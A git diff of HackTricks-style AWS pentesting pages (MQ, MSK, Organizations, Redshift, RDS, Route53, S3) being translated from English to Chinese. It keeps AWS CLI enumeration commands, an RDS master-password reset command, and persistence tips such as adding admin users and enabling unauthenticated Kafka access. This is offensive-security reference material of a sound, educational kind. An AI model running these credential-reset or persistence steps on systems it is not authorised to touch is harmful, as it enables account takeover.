MQ**简化了在AWS上部署、操作和维护消息代理的过程。它为**Apache ActiveMQ**和**RabbitMQ**提供托管服务,确保无缝的资源配置和自动软件版本更新。 ### AWS - RabbitMQ -RabbitMQ is a prominent **message-queueing software**, also known as a _message broker_ or _queue manager_. It's fundamentally a system where queues are configured. Applications interface with these queues to **send and receive messages**. Messages in this context can carry a variety of information, ranging from commands to initiate processes on other applications (potentially on different servers) to simple text messages. The messages are held by the queue-manager software until they are retrieved and processed by a receiving application. AWS provides an easy-to-use solution for hosting and managing RabbitMQ servers. +RabbitMQ是一种突出的**消息队列软件**,也被称为_消息代理_或_队列管理器_。它本质上是一个配置队列的系统。应用程序通过这些队列**发送和接收消息**。在这种情况下,消息可以携带各种信息,从启动其他应用程序(可能在不同服务器上)进程的命令到简单的文本消息。这些消息由队列管理软件保存,直到被接收应用程序检索和处理。AWS提供了一个易于使用的解决方案来托管和管理RabbitMQ服务器。 ### AWS - ActiveMQ -Apache ActiveMQ® is a leading open-source, Java-based **message broker** known for its versatility. It supports multiple industry-standard protocols, offering extensive client compatibility across a wide array of languages and platforms. Users can: +Apache ActiveMQ®是一种领先的开源、基于Java的**消息代理**,以其多功能性而闻名。它支持多种行业标准协议,提供广泛的客户端兼容性,适用于各种语言和平台。用户可以: -- Connect with clients written in JavaScript, C, C++, Python, .Net, and more. -- Leverage the **AMQP** protocol to integrate applications from different platforms. -- Use **STOMP** over websockets for web application message exchanges. -- Manage IoT devices with **MQTT**. -- Maintain existing **JMS** infrastructure and extend its capabilities. +- 连接用JavaScript、C、C++、Python、.Net等编写的客户端。 +- 利用**AMQP**协议集成来自不同平台的应用程序。 +- 使用**STOMP**通过WebSocket进行Web应用程序消息交换。 +- 使用**MQTT**管理物联网设备。 +- 维护现有的**JMS**基础设施并扩展其功能。 -ActiveMQ's robustness and flexibility make it suitable for a multitude of messaging requirements. - -## Enumeration +ActiveMQ的强大和灵活性使其适用于多种消息传递需求。 +## 枚举 ```bash # List brokers aws mq list-brokers @@ -48,9 +47,8 @@ aws mq list-configurations # Creacte Active MQ user aws mq create-user --broker-id --password --username --console-access ``` - > [!WARNING] -> TODO: Indicate how to enumerate RabbitMQ and ActiveMQ internally and how to listen in all queues and send data (send PR if you know how to do this) +> TODO: 指示如何在内部枚举 RabbitMQ 和 ActiveMQ,以及如何监听所有队列并发送数据(如果您知道如何做到这一点,请发送 PR) ## Privesc @@ -66,7 +64,7 @@ aws mq create-user --broker-id --password --username --c ## Persistence -If you know the credentials to access the RabbitMQ web console, you can create a new user qith admin privileges. +如果您知道访问 RabbitMQ 网络控制台的凭据,您可以创建一个具有管理员权限的新用户。 ## References @@ -74,7 +72,3 @@ If you know the credentials to access the RabbitMQ web console, you can create a - [https://activemq.apache.org/](https://activemq.apache.org/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md index 42c7ca640..48743518d 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md @@ -4,22 +4,21 @@ ## Amazon MSK -**Amazon Managed Streaming for Apache Kafka (Amazon MSK)** is a service that is fully managed, facilitating the development and execution of applications processing streaming data through **Apache Kafka**. Control-plane operations, including creation, update, and deletion of **clusters**, are offered by Amazon MSK. The service permits the utilization of Apache Kafka **data-plane operations**, encompassing data production and consumption. It operates on **open-source versions of Apache Kafka**, ensuring compatibility with existing applications, tooling, and plugins from both partners and the **Apache Kafka community**, eliminating the need for alterations in the application code. +**Amazon Managed Streaming for Apache Kafka (Amazon MSK)** 是一个完全托管的服务,便于开发和执行处理流数据的应用程序,通过 **Apache Kafka**。控制平面操作,包括 **集群** 的创建、更新和删除,由 Amazon MSK 提供。该服务允许利用 Apache Kafka **数据平面操作**,包括数据生产和消费。它基于 **Apache Kafka** 的开源版本运行,确保与现有应用程序、工具和来自合作伙伴及 **Apache Kafka 社区** 的插件兼容,消除了对应用程序代码进行更改的需要。 -In terms of reliability, Amazon MSK is designed to **automatically detect and recover from prevalent cluster failure scenarios**, ensuring that producer and consumer applications persist in their data writing and reading activities with minimal disruption. Moreover, it aims to optimize data replication processes by attempting to **reuse the storage of replaced brokers**, thereby minimizing the volume of data that needs to be replicated by Apache Kafka. +在可靠性方面,Amazon MSK 旨在 **自动检测和恢复常见的集群故障场景**,确保生产者和消费者应用程序在数据写入和读取活动中保持最小的中断。此外,它旨在通过尝试 **重用被替换代理的存储** 来优化数据复制过程,从而最小化 Apache Kafka 需要复制的数据量。 ### **Types** -There are 2 types of Kafka clusters that AWS allows to create: Provisioned and Serverless. +AWS 允许创建 2 种类型的 Kafka 集群:预配置和无服务器。 -From the point of view of an attacker you need to know that: +从攻击者的角度来看,您需要知道: -- **Serverless cannot be directly public** (it can only run in a VPN without any publicly exposed IP). However, **Provisioned** can be configured to get a **public IP** (by default it doesn't) and configure the **security group** to **expose** the relevant ports. -- **Serverless** **only support IAM** as authentication method. **Provisioned** support SASL/SCRAM (**password**) authentication, **IAM** authentication, AWS **Certificate** Manager (ACM) authentication and **Unauthenticated** access. - - Note that it's not possible to expose publicly a Provisioned Kafka if unauthenticated access is enabled +- **无服务器不能直接公开**(它只能在没有任何公开暴露 IP 的 VPN 中运行)。然而,**预配置** 可以配置为获取 **公共 IP**(默认情况下不获取)并配置 **安全组** 以 **暴露** 相关端口。 +- **无服务器** **仅支持 IAM** 作为身份验证方法。**预配置** 支持 SASL/SCRAM (**密码**) 身份验证、**IAM** 身份验证、AWS **证书** 管理器 (ACM) 身份验证和 **未认证** 访问。 +- 请注意,如果启用了未认证访问,则无法公开暴露预配置的 Kafka。 ### Enumeration - ```bash #Get clusters aws kafka list-clusters @@ -43,9 +42,7 @@ aws kafka describe-configuration-revision --arn --revision ``` - -### Kafka IAM Access (in serverless) - +### Kafka IAM 访问(在无服务器中) ```bash # Guide from https://docs.aws.amazon.com/msk/latest/developerguide/create-serverless-cluster.html # Download Kafka @@ -75,7 +72,6 @@ kafka_2.12-2.8.1/bin/kafka-console-producer.sh --broker-list $BS --producer.conf # Read messages kafka_2.12-2.8.1/bin/kafka-console-consumer.sh --bootstrap-server $BS --consumer.config client.properties --topic msk-serverless-tutorial --from-beginning ``` - ### Privesc {{#ref}} @@ -90,14 +86,10 @@ kafka_2.12-2.8.1/bin/kafka-console-consumer.sh --bootstrap-server $BS --consumer ### Persistence -If you are going to **have access to the VPC** where a Provisioned Kafka is, you could **enable unauthorised access**, if **SASL/SCRAM authentication**, **read** the password from the secret, give some **other controlled user IAM permissions** (if IAM or serverless used) or persist with **certificates**. +如果您将要**访问VPC**,其中有一个Provisioned Kafka,您可以**启用未授权访问**,如果**SASL/SCRAM身份验证**,**读取**密码从秘密中,给予一些**其他受控用户IAM权限**(如果使用IAM或无服务器)或通过**证书**保持持久性。 ## References - [https://docs.aws.amazon.com/msk/latest/developerguide/what-is-msk.html](https://docs.aws.amazon.com/msk/latest/developerguide/what-is-msk.html) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md index df5a51a37..8ed7d3c6c 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md @@ -2,23 +2,22 @@ {{#include ../../../banners/hacktricks-training.md}} -## Baisc Information +## 基本信息 -AWS Organizations facilitates the creation of new AWS accounts without incurring additional costs. Resources can be allocated effortlessly, accounts can be efficiently grouped, and governance policies can be applied to individual accounts or groups, enhancing management and control within the organization. +AWS Organizations 使得创建新的 AWS 账户变得简单且无需额外费用。资源可以轻松分配,账户可以高效分组,并且可以对单个账户或组应用治理政策,从而增强组织内的管理和控制。 -Key Points: +关键点: -- **New Account Creation**: AWS Organizations allows the creation of new AWS accounts without extra charges. -- **Resource Allocation**: It simplifies the process of allocating resources across the accounts. -- **Account Grouping**: Accounts can be grouped together, making management more streamlined. -- **Governance Policies**: Policies can be applied to accounts or groups of accounts, ensuring compliance and governance across the organization. +- **新账户创建**:AWS Organizations 允许创建新的 AWS 账户而无需额外费用。 +- **资源分配**:它简化了跨账户分配资源的过程。 +- **账户分组**:账户可以被分组在一起,使管理更加高效。 +- **治理政策**:可以对账户或账户组应用政策,确保组织内的合规性和治理。 -You can find more information in: +您可以在以下位置找到更多信息: {{#ref}} ../aws-basic-information/ {{#endref}} - ```bash # Get Org aws organizations describe-organization @@ -39,13 +38,8 @@ aws organizations list-accounts-for-parent --parent-id ou-n8s9-8nzv3a5y ## You need the permission iam:GetAccountSummary aws iam get-account-summary ``` - -## References +## 参考 - https://aws.amazon.com/organizations/ {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md index d5cb84f1d..b27b3670a 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md @@ -1,28 +1,20 @@ -# AWS - Other Services Enum +# AWS - 其他服务枚举 {{#include ../../../banners/hacktricks-training.md}} ## Directconnect -Allows to **connect a corporate private network with AWS** (so you could compromise an EC2 instance and access the corporate network). - +允许**将企业私有网络与AWS连接**(这样您可以攻破EC2实例并访问企业网络)。 ``` aws directconnect describe-connections aws directconnect describe-interconnects aws directconnect describe-virtual-gateways aws directconnect describe-virtual-interfaces ``` - ## Support -In AWS you can access current and previous support cases via the API - +在AWS中,您可以通过API访问当前和以前的支持案例。 ``` aws support describe-cases --include-resolved-cases ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md index 7ae94d5d6..3483838fc 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md @@ -4,46 +4,45 @@ ## Amazon Redshift -Redshift is a fully managed service that can scale up to over a petabyte in size, which is used as a **data warehouse for big data solutions**. Using Redshift clusters, you are able to run analytics against your datasets using fast, SQL-based query tools and business intelligence applications to gather greater understanding of vision for your business. +Redshift 是一个完全托管的服务,可以扩展到超过一个 PB 的大小,用作 **大数据解决方案的数据仓库**。使用 Redshift 集群,您可以使用快速的基于 SQL 的查询工具和商业智能应用程序对数据集进行分析,以更好地理解您业务的愿景。 -**Redshift offers encryption at rest using a four-tired hierarchy of encryption keys using either KMS or CloudHSM to manage the top tier of keys**. **When encryption is enabled for your cluster, it can't be disable and vice versa**. When you have an unencrypted cluster, it can't be encrypted. +**Redshift 提供静态加密,使用四层加密密钥层次结构,使用 KMS 或 CloudHSM 管理顶层密钥**。**当为您的集群启用加密时,无法禁用,反之亦然**。当您拥有未加密的集群时,无法进行加密。 -Encryption for your cluster can only happen during its creation, and once encrypted, the data, metadata, and any snapshots are also encrypted. The tiering level of encryption keys are as follows, **tier one is the master key, tier two is the cluster encryption key, the CEK, tier three, the database encryption key, the DEK, and finally tier four, the data encryption keys themselves**. +集群的加密只能在创建时进行,一旦加密,数据、元数据和任何快照也会被加密。加密密钥的层次级别如下,**第一层是主密钥,第二层是集群加密密钥,CEK,第三层是数据库加密密钥,DEK,最后第四层是数据加密密钥本身**。 ### KMS -During the creation of your cluster, you can either select the **default KMS key** for Redshift or select your **own CMK**, which gives you more flexibility over the control of the key, specifically from an auditable perspective. +在创建集群时,您可以选择 Redshift 的 **默认 KMS 密钥** 或选择您自己的 **CMK**,这使您在密钥控制方面具有更大的灵活性,特别是从可审计的角度来看。 -The default KMS key for Redshift is automatically created by Redshift the first time the key option is selected and used, and it is fully managed by AWS. +Redshift 的默认 KMS 密钥是在第一次选择和使用密钥选项时自动创建的,并由 AWS 完全管理。 -This KMS key is then encrypted with the CMK master key, tier one. This encrypted KMS data key is then used as the cluster encryption key, the CEK, tier two. This CEK is then sent by KMS to Redshift where it is stored separately from the cluster. Redshift then sends this encrypted CEK to the cluster over a secure channel where it is stored in memory. +此 KMS 密钥随后使用 CMK 主密钥进行加密,第一层。此加密的 KMS 数据密钥随后用作集群加密密钥,CEK,第二层。此 CEK 然后由 KMS 发送到 Redshift,在那里它与集群分开存储。Redshift 然后通过安全通道将此加密的 CEK 发送到集群,在内存中存储。 -Redshift then requests KMS to decrypt the CEK, tier two. This decrypted CEK is then also stored in memory. Redshift then creates a random database encryption key, the DEK, tier three, and loads that into the memory of the cluster. The decrypted CEK in memory then encrypts the DEK, which is also stored in memory. +Redshift 然后请求 KMS 解密 CEK,第二层。此解密的 CEK 也存储在内存中。Redshift 然后创建一个随机的数据库加密密钥,DEK,第三层,并将其加载到集群的内存中。内存中的解密 CEK 然后加密 DEK,DEK 也存储在内存中。 -This encrypted DEK is then sent over a secure channel and stored in Redshift separately from the cluster. Both the CEK and the DEK are now stored in memory of the cluster both in an encrypted and decrypted form. The decrypted DEK is then used to encrypt data keys, tier four, that are randomly generated by Redshift for each data block in the database. +此加密的 DEK 然后通过安全通道发送并单独存储在 Redshift 中。CEK 和 DEK 现在都以加密和解密的形式存储在集群的内存中。解密的 DEK 然后用于加密数据密钥,第四层,这些密钥是 Redshift 为数据库中的每个数据块随机生成的。 -You can use AWS Trusted Advisor to monitor the configuration of your Amazon S3 buckets and ensure that bucket logging is enabled, which can be useful for performing security audits and tracking usage patterns in S3. +您可以使用 AWS Trusted Advisor 监控 Amazon S3 存储桶的配置,并确保启用存储桶日志记录,这对于执行安全审计和跟踪 S3 中的使用模式非常有用。 ### CloudHSM
-Using Redshift with CloudHSM +使用 CloudHSM 的 Redshift -When working with CloudHSM to perform your encryption, firstly you must set up a trusted connection between your HSM client and Redshift while using client and server certificates. +在使用 CloudHSM 进行加密时,首先必须在 HSM 客户端和 Redshift 之间建立受信任的连接,同时使用客户端和服务器证书。 -This connection is required to provide secure communications, allowing encryption keys to be sent between your HSM client and your Redshift clusters. Using a randomly generated private and public key pair, Redshift creates a public client certificate, which is encrypted and stored by Redshift. This must be downloaded and registered to your HSM client, and assigned to the correct HSM partition. +此连接是提供安全通信所必需的,允许在 HSM 客户端和 Redshift 集群之间发送加密密钥。使用随机生成的私钥和公钥对,Redshift 创建一个公共客户端证书,该证书由 Redshift 加密并存储。必须下载并注册到您的 HSM 客户端,并分配给正确的 HSM 分区。 -You must then configure Redshift with the following details of your HSM client: the HSM IP address, the HSM partition name, the HSM partition password, and the public HSM server certificate, which is encrypted by CloudHSM using an internal master key. Once this information has been provided, Redshift will confirm and verify that it can connect and access development partition. +然后,您必须使用以下 HSM 客户端的详细信息配置 Redshift:HSM IP 地址、HSM 分区名称、HSM 分区密码和公共 HSM 服务器证书,该证书由 CloudHSM 使用内部主密钥加密。一旦提供了这些信息,Redshift 将确认并验证它可以连接并访问开发分区。 -If your internal security policies or governance controls dictate that you must apply key rotation, then this is possible with Redshift enabling you to rotate encryption keys for encrypted clusters, however, you do need to be aware that during the key rotation process, it will make a cluster unavailable for a very short period of time, and so it's best to only rotate keys as and when you need to, or if you feel they may have been compromised. +如果您的内部安全政策或治理控制规定您必须应用密钥轮换,那么这在 Redshift 中是可能的,允许您为加密集群轮换加密密钥,但您需要注意,在密钥轮换过程中,它会使集群在非常短的时间内不可用,因此最好仅在需要时或如果您觉得密钥可能已被泄露时进行轮换。 -During the rotation, Redshift will rotate the CEK for your cluster and for any backups of that cluster. It will rotate a DEK for the cluster but it's not possible to rotate a DEK for the snapshots stored in S3 that have been encrypted using the DEK. It will put the cluster into a state of 'rotating keys' until the process is completed when the status will return to 'available'. +在轮换期间,Redshift 将为您的集群及其任何备份轮换 CEK。它将为集群轮换 DEK,但无法为使用 DEK 加密的存储在 S3 中的快照轮换 DEK。它将使集群处于“轮换密钥”的状态,直到过程完成,状态将返回为“可用”。
### Enumeration - ```bash # Get clusters aws redshift describe-clusters @@ -82,7 +81,6 @@ aws redshift describe-scheduled-actions # The redshift instance must be publicly available (not by default), the sg need to allow inbounds connections to the port and you need creds psql -h redshift-cluster-1.sdflju3jdfkfg.us-east-1.redshift.amazonaws.com -U admin -d dev -p 5439 ``` - ## Privesc {{#ref}} @@ -91,13 +89,9 @@ psql -h redshift-cluster-1.sdflju3jdfkfg.us-east-1.redshift.amazonaws.com -U adm ## Persistence -The following actions allow to grant access to other AWS accounts to the cluster: +以下操作允许将对集群的访问权限授予其他AWS账户: - [authorize-endpoint-access](https://docs.aws.amazon.com/cli/latest/reference/redshift/authorize-endpoint-access.html) - [authorize-snapshot-access](https://docs.aws.amazon.com/cli/latest/reference/redshift/authorize-snapshot-access.html) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md index 473369403..55330a865 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md @@ -2,76 +2,75 @@ {{#include ../../../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -The **Relational Database Service (RDS)** offered by AWS is designed to streamline the deployment, operation, and scaling of a **relational database in the cloud**. This service offers the advantages of cost efficiency and scalability while automating labor-intensive tasks like hardware provisioning, database configuration, patching, and backups. +AWS 提供的 **关系数据库服务 (RDS)** 旨在简化 **云中关系数据库** 的部署、操作和扩展。该服务提供了成本效益和可扩展性的优势,同时自动化了诸如硬件配置、数据库配置、补丁和备份等劳动密集型任务。 -AWS RDS supports various widely-used relational database engines including MySQL, PostgreSQL, MariaDB, Oracle Database, Microsoft SQL Server, and Amazon Aurora, with compatibility for both MySQL and PostgreSQL. +AWS RDS 支持多种广泛使用的关系数据库引擎,包括 MySQL、PostgreSQL、MariaDB、Oracle 数据库、Microsoft SQL Server 和 Amazon Aurora,兼容 MySQL 和 PostgreSQL。 -Key features of RDS include: +RDS 的主要特点包括: -- **Management of database instances** is simplified. -- Creation of **read replicas** to enhance read performance. -- Configuration of **multi-Availability Zone (AZ) deployments** to ensure high availability and failover mechanisms. -- **Integration** with other AWS services, such as: - - AWS Identity and Access Management (**IAM**) for robust access control. - - AWS **CloudWatch** for comprehensive monitoring and metrics. - - AWS Key Management Service (**KMS**) for ensuring encryption at rest. +- **数据库实例的管理** 简化。 +- 创建 **只读副本** 以增强读取性能。 +- 配置 **多可用区 (AZ) 部署** 以确保高可用性和故障转移机制。 +- 与其他 AWS 服务的 **集成**,例如: +- AWS 身份和访问管理 (**IAM**) 以实现强大的访问控制。 +- AWS **CloudWatch** 以进行全面监控和指标。 +- AWS 密钥管理服务 (**KMS**) 以确保静态加密。 -## Credentials +## 凭证 -When creating the DB cluster the master **username** can be configured (**`admin`** by default). To generate the password of this user you can: +创建 DB 集群时,可以配置主 **用户名**(默认为 **`admin`**)。要生成该用户的密码,可以: -- **Indicate** a **password** yourself -- Tell RDS to **auto generate** it -- Tell RDS to manage it in **AWS Secret Manager** encrypted with a KMS key +- **自己指定** 一个 **密码** +- 告诉 RDS **自动生成** 它 +- 告诉 RDS 在 **AWS Secret Manager** 中管理它,并使用 KMS 密钥进行加密
-### Authentication +### 认证 -There are 3 types of authentication options, but using the **master password is always allowed**: +有 3 种认证选项,但始终允许使用 **主密码**:
-### Public Access & VPC +### 公共访问与 VPC -By default **no public access is granted** to the databases, however it **could be granted**. Therefore, by default only machines from the same VPC will be able to access it if the selected **security group** (are stored in EC2 SG)allows it. +默认情况下,**不授予公共访问** 数据库,但可以 **授予**。因此,默认情况下,只有来自同一 VPC 的机器才能访问它,如果所选的 **安全组**(存储在 EC2 SG 中)允许的话。 -Instead of exposing a DB instance, it’s possible to create a **RDS Proxy** which **improves** the **scalability** & **availability** of the DB cluster. +与其暴露 DB 实例,不如创建一个 **RDS Proxy**,它 **提高** 了 DB 集群的 **可扩展性** 和 **可用性**。 -Moreover, the **database port can be modified** also. +此外,**数据库端口也可以修改**。 -### Encryption +### 加密 -**Encryption is enabled by default** using a AWS managed key (a CMK could be chosen instead). +**默认启用加密**,使用 AWS 管理的密钥(可以选择 CMK)。 -By enabling your encryption, you are enabling **encryption at rest for your storage, snapshots, read replicas and your back-ups**. Keys to manage this encryption can be issued by using **KMS**.\ -It's not possible to add this level of encryption after your database has been created. **It has to be done during its creation**. +通过启用加密,您启用了 **存储、快照、只读副本和备份的静态加密**。管理此加密的密钥可以通过 **KMS** 发放。\ +在数据库创建后,无法添加此级别的加密。**必须在创建时进行**。 -However, there is a **workaround allowing you to encrypt an unencrypted database as follows**. You can create a snapshot of your unencrypted database, create an encrypted copy of that snapshot, use that encrypted snapshot to create a new database, and then, finally, your database would then be encrypted. +然而,有一个 **解决方法允许您加密未加密的数据库,如下所示**。您可以创建未加密数据库的快照,创建该快照的加密副本,使用该加密快照创建新数据库,最后,您的数据库将被加密。 -#### Transparent Data Encryption (TDE) +#### 透明数据加密 (TDE) -Alongside the encryption capabilities inherent to RDS at the application level, RDS also supports **additional platform-level encryption mechanisms** to safeguard data at rest. This includes **Transparent Data Encryption (TDE)** for Oracle and SQL Server. However, it's crucial to note that while TDE enhances security by encrypting data at rest, it may also **affect database performance**. This performance impact is especially noticeable when used in conjunction with MySQL cryptographic functions or Microsoft Transact-SQL cryptographic functions. +除了 RDS 在应用层固有的加密能力外,RDS 还支持 **额外的平台级加密机制** 以保护静态数据。这包括 Oracle 和 SQL Server 的 **透明数据加密 (TDE)**。然而,重要的是要注意,虽然 TDE 通过加密静态数据来增强安全性,但它也可能 **影响数据库性能**。这种性能影响在与 MySQL 加密函数或 Microsoft Transact-SQL 加密函数结合使用时尤为明显。 -To utilize TDE, certain preliminary steps are required: +要使用 TDE,需要一些初步步骤: -1. **Option Group Association**: - - The database must be associated with an option group. Option groups serve as containers for settings and features, facilitating database management, including security enhancements. - - However, it's important to note that option groups are only available for specific database engines and versions. -2. **Inclusion of TDE in Option Group**: - - Once associated with an option group, the Oracle Transparent Data Encryption option needs to be included in that group. - - It's essential to recognize that once the TDE option is added to an option group, it becomes a permanent fixture and cannot be removed. -3. **TDE Encryption Modes**: - - TDE offers two distinct encryption modes: - - **TDE Tablespace Encryption**: This mode encrypts entire tables, providing a broader scope of data protection. - - **TDE Column Encryption**: This mode focuses on encrypting specific, individual elements within the database, allowing for more granular control over what data is encrypted. +1. **选项组关联**: +- 数据库必须与选项组关联。选项组作为设置和功能的容器,促进数据库管理,包括安全增强。 +- 但是,重要的是要注意,选项组仅适用于特定的数据库引擎和版本。 +2. **在选项组中包含 TDE**: +- 一旦与选项组关联,Oracle 透明数据加密选项需要包含在该组中。 +- 需要认识到,一旦将 TDE 选项添加到选项组中,它就成为永久性固定项,无法移除。 +3. **TDE 加密模式**: +- TDE 提供两种不同的加密模式: +- **TDE 表空间加密**:此模式加密整个表,提供更广泛的数据保护范围。 +- **TDE 列加密**:此模式专注于加密数据库中的特定单个元素,允许对加密数据进行更细粒度的控制。 -Understanding these prerequisites and the operational intricacies of TDE is crucial for effectively implementing and managing encryption within RDS, ensuring both data security and compliance with necessary standards. - -### Enumeration +理解这些前提条件和 TDE 的操作复杂性对于有效实施和管理 RDS 中的加密至关重要,以确保数据安全和遵守必要的标准。 +### 枚举 ```bash # Clusters info ## Get Endpoints, username, port, iam auth enabled, attached roles, SG @@ -106,41 +105,36 @@ aws rds describe-db-proxy-targets ## reset credentials of MasterUsername aws rds modify-db-instance --db-instance-identifier --master-user-password --apply-immediately ``` - -### Unauthenticated Access +### 未经身份验证的访问 {{#ref}} ../aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md {{#endref}} -### Privesc +### 权限提升 {{#ref}} ../aws-privilege-escalation/aws-rds-privesc.md {{#endref}} -### Post Exploitation +### 利用后 {{#ref}} ../aws-post-exploitation/aws-rds-post-exploitation.md {{#endref}} -### Persistence +### 持久性 {{#ref}} ../aws-persistence/aws-rds-persistence.md {{#endref}} -### SQL Injection +### SQL 注入 -There are ways to access DynamoDB data with **SQL syntax**, therefore, typical **SQL injections are also possible**. +有方法可以使用 **SQL 语法** 访问 DynamoDB 数据,因此,典型的 **SQL 注入也是可能的**。 {{#ref}} https://book.hacktricks.xyz/pentesting-web/sql-injection {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md index c37002eb7..27c44f695 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md @@ -4,16 +4,15 @@ ## Route 53 -Amazon Route 53 is a cloud **Domain Name System (DNS)** web service.\ -You can create https, http and tcp **health checks for web pages** via Route53. +亚马逊 Route 53 是一个云 **域名系统 (DNS)** 网络服务。\ +您可以通过 Route53 创建 https、http 和 tcp **网页健康检查**。 -### IP-based routing +### 基于 IP 的路由 -This is useful to tune your DNS routing to make the best DNS routing decisions for your end users.\ -IP-based routing offers you the additional ability to **optimize routing based on specific knowledge of your customer base**. - -### Enumeration +这对于调整您的 DNS 路由以为最终用户做出最佳 DNS 路由决策非常有用。\ +基于 IP 的路由为您提供了 **根据对客户群的特定知识优化路由** 的额外能力。 +### 枚举 ```bash aws route53 list-hosted-zones # Get domains aws route53 get-hosted-zone --id @@ -21,7 +20,6 @@ aws route53 list-resource-record-sets --hosted-zone-id # Get al aws route53 list-health-checks aws route53 list-traffic-policies ``` - ### Privesc {{#ref}} @@ -29,7 +27,3 @@ aws route53 list-traffic-policies {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md index 3133c0eac..5eb766e8c 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md @@ -4,144 +4,137 @@ ## S3 -Amazon S3 is a service that allows you **store big amounts of data**. +Amazon S3 是一个允许您 **存储大量数据** 的服务。 -Amazon S3 provides multiple options to achieve the **protection** of data at REST. The options include **Permission** (Policy), **Encryption** (Client and Server Side), **Bucket Versioning** and **MFA** **based delete**. The **user can enable** any of these options to achieve data protection. **Data replication** is an internal facility by AWS where **S3 automatically replicates each object across all the Availability Zones** and the organization need not enable it in this case. +Amazon S3 提供多种选项来实现数据在静态状态下的 **保护**。这些选项包括 **权限**(策略)、**加密**(客户端和服务器端)、**桶版本控制** 和 **基于 MFA 的删除**。**用户可以启用** 这些选项中的任何一个来实现数据保护。**数据复制** 是 AWS 的一项内部功能,**S3 会自动在所有可用区复制每个对象**,在这种情况下,组织无需启用它。 -With resource-based permissions, you can define permissions for sub-directories of your bucket separately. +通过基于资源的权限,您可以单独为存储桶的子目录定义权限。 -### Bucket Versioning and MFA based delete +### 桶版本控制和基于 MFA 的删除 -When bucket versioning is enabled, any action that tries to alter a file inside a file will generate a new version of the file, keeping also the previous content of the same. Therefore, it won't overwrite its content. +当启用桶版本控制时,任何试图更改文件的操作都会生成该文件的新版本,同时保留相同文件的先前内容。因此,它不会覆盖其内容。 -Moreover, MFA based delete will prevent versions of file in the S3 bucket from being deleted and also Bucket Versioning from being disabled, so an attacker won't be able to alter these files. +此外,基于 MFA 的删除将防止 S3 存储桶中的文件版本被删除,也将防止桶版本控制被禁用,因此攻击者将无法更改这些文件。 -### S3 Access logs +### S3 访问日志 -It's possible to **enable S3 access login** (which by default is disabled) to some bucket and save the logs in a different bucket to know who is accessing the bucket (both buckets must be in the same region). +可以 **启用 S3 访问登录**(默认情况下是禁用的)到某个存储桶,并将日志保存在另一个存储桶中,以了解谁在访问该存储桶(两个存储桶必须在同一区域内)。 -### S3 Presigned URLs - -It's possible to generate a presigned URL that can usually be used to **access the specified file** in the bucket. A **presigned URL looks like this**: +### S3 预签名 URL +可以生成一个预签名 URL,通常用于 **访问存储桶中的指定文件**。一个 **预签名 URL 看起来像这样**: ``` 